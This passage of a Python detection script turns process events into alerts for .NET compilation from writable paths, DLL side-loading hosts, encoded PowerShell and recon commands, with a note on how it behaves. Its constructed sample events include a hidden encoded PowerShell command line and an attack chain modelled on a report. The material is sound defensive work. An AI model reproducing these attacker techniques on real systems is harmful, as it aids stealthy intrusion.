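        # 1. .NET compiler fed a .cmdline from a user-writable path: the
        #    powershell.exe -> csc.exe -> cvtres.exe chain behind the Sigma
        #    "Dot net compiler compiles file from suspicious location" hit.
        if name in ("csc.exe", "vbc.exe") and ".cmdline" in cl_low \
                and any(root in cl_low for root in WRITABLE_ROOTS):
            findings.append(Finding("dotnet_compile_from_writable_path", e.pid,
                                    f"parent={pname} cmdline={e.cmdline}"))

        # 2. Known side-loading host started outside a trusted install root
        #    (oleview.exe was dropped next to aclui.dll under ProgramData).
        if name in SIDELOAD_HOSTS and not image_low.startswith(TRUSTED_ROOTS):
            findings.append(Finding("sideload_host_outside_trusted_root", e.pid, e.image))

        # 3. Script host with an encoded command line: record the decoded text.
        if name in ("powershell.exe", "pwsh.exe"):
            plain = decode_encoded_command(e.cmdline)
            if plain is not None:
                findings.append(Finding("powershell_encoded_command", e.pid, plain))

        # 4. whoami/hostname launched by a script host (user and host recon).
        if name in ("whoami.exe", "hostname.exe") \
                and pname in ("powershell.exe", "pwsh.exe", "cmd.exe"):
            findings.append(Finding("recon_from_script_host", e.pid, f"{pname} -> {name}"))
    return findings


def sample_events() -> List[ProcEvent]:
    """Constructed events shaped after the report's graph; the 'example'
    directories and all pids are invented for this example."""
    enc = base64.b64encode("whoami".encode("utf-16-le")).decode()
    return [
        ProcEvent(10, 2, r"C:\Users\user\Desktop\VirtManage.exe", "VirtManage.exe"),
        ProcEvent(21, 10, r"C:\ProgramData\Microsoft\example\oleview.exe", "oleview.exe"),
        ProcEvent(35, 21, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                  f"powershell.exe -nop -w hidden -enc {enc}"),
        ProcEvent(54, 35, r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe",
                  r'csc.exe /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\example\b0okydtw.cmdline"'),
        ProcEvent(61, 54, r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe", "cvtres.exe"),
        ProcEvent(59, 35, r"C:\Windows\System32\whoami.exe", "whoami.exe"),
        ProcEvent(46, 10, r"C:\Windows\System32\w32tm.exe", "w32tm.exe /resync"),
    ]


if __name__ == "__main__":
    for f in run_rules(sample_events()):
        print(f"{f.rule:36} pid={f.pid:<4} {f.detail}")
```

Running the block prints one line per finding (four for the constructed events). `decode_encoded_command` accepts the -e, -ec, -enc and -EncodedCommand spellings and returns None rather than raising when the argument is not valid base64 UTF-16LE, so a malformed command line does not stall the rule loop; the parent lookup is by pid within the same event batch, which is enough for a sandbox trace but needs a session-scoped process table in a real pipeline.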
